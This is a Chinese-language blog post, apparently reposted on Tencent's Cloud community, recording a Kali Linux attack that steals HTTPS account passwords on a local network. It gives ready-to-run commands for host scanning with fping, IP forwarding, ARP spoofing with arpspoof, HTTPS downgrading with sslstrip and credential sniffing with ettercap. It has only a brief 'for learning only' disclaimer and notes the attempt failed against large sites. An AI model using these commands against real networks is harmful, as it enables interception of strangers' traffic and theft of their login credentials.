kali 内网HTTPS账号密码获取记录

注:本教程只用于学习使用,切勿拿去搞破坏,一切法律后果与本人无关

1.原理:

在局域网环境中,通过ARP欺骗,将目标主机的网络包都流经攻击者,然后再通过嗅探的方式从而获取到HTTPS的一些数据信息。原理和HTTP账号密码获取类似,不过https是由ssl加密,加密性的安全性更高,使用工具sslstrip可将实现https转换成http,再用HTTP账号密码获取方法就可以了。

(大部分的大型网站都无法进行嗅探获取密码。试验失败了,这里做实验记录)

2. 局域网IP扫描:

命令:

fping -asg 192.168.43.0/24

ctrl+c停止扫描

3. 工具使用:arpspoof、ettercap、sslstrip

命令:

arpspoof -i +网卡 -t +网关 +目标IP

ettercap -Tq -i +网卡

-T参数即--text,启动文本模式;-q参数即--quiet,不显示包的内容

sslstrip -a -f -k

ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。

4. 实践记录:

4.1更改Sslstrip配置文件

vim /etc/ettercap/etter.conf

保存退出

4.2查看自己的IP和网关:ifconfig、route -n

4.3扫描其他人的IP:fping 192.168.43.0/24

4.4进行IP流量转发:

echo 1 > /proc//sys/net/ipv4/ip_forward

4.5进行ARP欺骗

命令:arpspoof -i eth0 -t 192.168.43.1 192.168.43.38

4.6再开一个终端,运行sslstrip -a -f -k 实现https转换成http以获取帐号密码

4.7再开一个终端,开始嗅探

输入:ettercap -Tq -i eth0

4.8当受害者登陆后,即可嗅探到账户和密码

当登录名称的字符是中文时,在嗅探到的内容中Content中的内容不是中文而是其URL形式的编码:

对于这种编码直接URL解码即可,最简单的方法是去URL解码的网站进行解码:

end

扫码即可关注~

ID和我一起学习记录

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180724G1MF8C00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券